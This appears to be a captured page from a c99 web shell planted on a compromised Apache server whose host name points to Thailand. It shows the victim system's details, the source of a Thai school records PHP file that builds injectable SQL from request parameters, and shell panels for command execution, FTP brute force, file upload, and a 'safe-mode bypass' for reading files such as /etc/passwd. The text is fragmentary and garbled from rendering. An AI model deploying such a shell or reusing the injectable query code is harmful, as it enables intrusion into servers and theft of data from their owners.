!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/   drwxr-xr-x
Free 52.82 GB of 127.8 GB (41.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     SearchTraningList.php (16.99 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |





<?=$_Config_sitename;?> - ข้อมูลงานสารบรรณ - ข้อมูลรายการหนังสือรับ-ส่ง









  

    
    
    = '".dmyE2ymdT($_REQUEST['dateStart'])."'  AND Date_start <= '".dmyE2ymdT($_REQUEST['dateFinish'])."' ORDER BY Date_start DESC";
		}
		else{
			$query = " SELECT *  FROM $myTable WHERE Year_std = '".(date('Y')+543)."' ORDER BY Date_start DESC";
		}
		$result = $dbObj->execQuery($query);
		$numrows = $dbObj->_numrows;
		//echo $query;
		
		/**  Paging  */
		$display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];
		$start = ( ($display * $limit) - $limit );
		/**  Paging  */

		$query .= " LIMIT $start, $limit ";
		$result = $dbObj->execQuery($query);
		
		/*if( $keyword != "" ) { 
			if( $selectTypeBook != "" ) { 
				if( isset($_GET['OrderBy']) ) {
					switch( $selectTypeBook ) {
						case 1 :
							$query = " SELECT *  FROM $myTable  WHERE  $myTableField1 LIKE '%$keyword%'  
											   ORDER BY  $OrderBy  $ASCDESC ";
							break;
						case 2 :
							$query = " SELECT *  FROM $myTable  WHERE   $myTableField2 LIKE '%$keyword%'  
											   ORDER BY  $OrderBy  $ASCDESC ";
							break;
						case 3 :
							$query = " SELECT *  FROM $myTable  WHERE   $myTableField3 LIKE '%$keyword%'  
											   ORDER BY  $OrderBy  $ASCDESC ";
							break;
						case 4 :
							$query = " SELECT *  FROM $myTable  WHERE   $myTableField4 LIKE '%$keyword%'  
											   ORDER BY  $OrderBy  $ASCDESC ";
							break;
						case 5 :
							$query = " SELECT *  FROM $myTable  WHERE   $myTableField5 LIKE '%$keyword%'  
											   ORDER BY  $OrderBy  $ASCDESC ";
							break;
					} # switch
				} # if
				elseif( !isset($_GET['OrderBy']) ) {
					switch( $selectTypeBook ) {
						case 1 :
							$query = " SELECT *  FROM $myTable  WHERE   $myTableField1 LIKE '%$keyword%'  
							  ORDER BY $myTablePK  ASC ";
							break;
						case 2 :
							$query = " SELECT *  FROM $myTable  WHERE   $myTableField2 LIKE '%$keyword%'  
							ORDER BY $myTablePK  ASC ";
							break;
						case 3 :
							$query = " SELECT *  FROM $myTable  WHERE   $myTableField3 LIKE '%$keyword%'  
							ORDER BY $myTablePK  ASC ";
							break;
						case 4 :
							$query = " SELECT *  FROM $myTable  WHERE   $myTableField4 LIKE '%$keyword%'  
							ORDER BY $myTablePK  ASC ";
							break;
						case 5 :
							$query = " SELECT *  FROM $myTable  WHERE   $myTableField5 LIKE '%$keyword%'  
							ORDER BY $myTablePK  ASC ";
							break;
					} # switch
				} # elseif
			} else {  // หาเฉพาะที่ใส่ Keyword
				if( isset($_GET['OrderBy']) ) {
					$query = " SELECT *  FROM $myTable  WHERE   ( $myTableField1 LIKE '%$keyword%'  
									   OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%'  OR  $myTableField4 LIKE '%$keyword%'  
									   OR  $myTableField5 LIKE '%$keyword%' )    ORDER BY  $OrderBy  $ASCDESC ";
				} 
				elseif( !isset($_GET['OrderBy']) ) {
					$query = " SELECT *  FROM $myTable  WHERE     ( $myTableField1 LIKE '%$keyword%'   OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%'  OR  $myTableField4 LIKE '%$keyword%'  
									   OR  $myTableField5 LIKE '%$keyword%' )    ORDER BY  $myTablePK  ASC ";
				}
			} # else
		} else {
			if( isset($_GET['OrderBy']) ) {
				$query = " SELECT *  FROM $myTable    ORDER BY  $OrderBy  $ASCDESC ";
				//$query = " SELECT *  FROM $myTable  WHERE Date_start >= '".dmyT2ymdE($_REQUEST['dateStart'])."'  AND Date_finish <= '".dmyT2ymdE($_REQUEST['dateFinish'])."' ORDER BY  $OrderBy  $ASCDESC ";
			} 
			elseif( !isset($_GET['OrderBy']) ) {
				//$query = " SELECT *  FROM $myTable       ORDER BY  $myTablePK  ASC ";
				$query = " SELECT *  FROM $myTable  WHERE Date_start >= '".dmyE2ymdT($_REQUEST['dateStart'])."'  AND Date_start <= '".dmyE2ymdT($_REQUEST['dateFinish'])."' ORDER BY  $myTablePK  ASC ";
			} # elseif
		} # else

		$query .= " LIMIT $start, $limit ";
		$result = $dbObj->execQuery($query);*/
    ?>
     

     

      

        
      

      

        หน้าหลัก » ค้นหาข้อมูลการไปราชการ
        

      

        

          

            
          

          

              ‹ ย้อนกลับ
          

          

            
            

          

            ทั้งหมด:  รายการ
            จำนวนข้อมูลต่อหน้า
                
          

        

      

      

         0 ) { ?>
          

            

              
					  	

					  		

								ค้นหา  ตั้งแต่วันที่
					  			
					  			  ถึงวันที่
					  			
			  		  			
			  		  			&dateFinish=">
							

			  			

			  		
            

          

          fetchArray($result) ) { 
				$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";
          ?>
            

            

              No
			  รายละเอียด
              
            

            

              
              ','TrainingDetail','730','450','yes');">
                execQuery($query);
          	  	$rs1 = $dbObj->fetchArray($result1);
				$dbObj->freeresult($result1);
          	  		echo " $rs1[First_name]$rs1[Teacher_name]  $rs1[Teacher_lastname]";
			?>
                
                
                (
               
                -
                
                ) 
            

            
          

          
        

          

            ไม่พบรายการที่ค้นหา

              กรุณาลองใหม่อีกครั้ง


              		
          

        

        
        

          

             0 ) { ?>
              

                

                  
                

                

                  หน้า:
                     1) {	
                            $previous = $display - 1;					

                    ?>
                    
bool(false)




:: Command execute ::


Enter:  
Select: 
 






:: Shadow's tricks :D  ::



  

    
Useful Commands 
    

    

      

        
        
          
        
         
        
          

        Warning. Kernel may be alerted using higher levels 

    

    

  

   
Kernel Info: 

      
      
	  
	  
	  
	  
    

    







:: Preddy's tricks :D  ::



  

    
Php Safe-Mode Bypass (Read Files)
    


    

      

      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      

    

    

  

   
Php Safe-Mode Bypass (List Directories):     

      


      Dir:  

 eg: /etc/


    

    








 
:: Search ::
  - regexp 

 
:: Upload ::
 
[ ok ]






:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]


:: Go Dir ::
 
:: Go File ::
 


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0061 ]--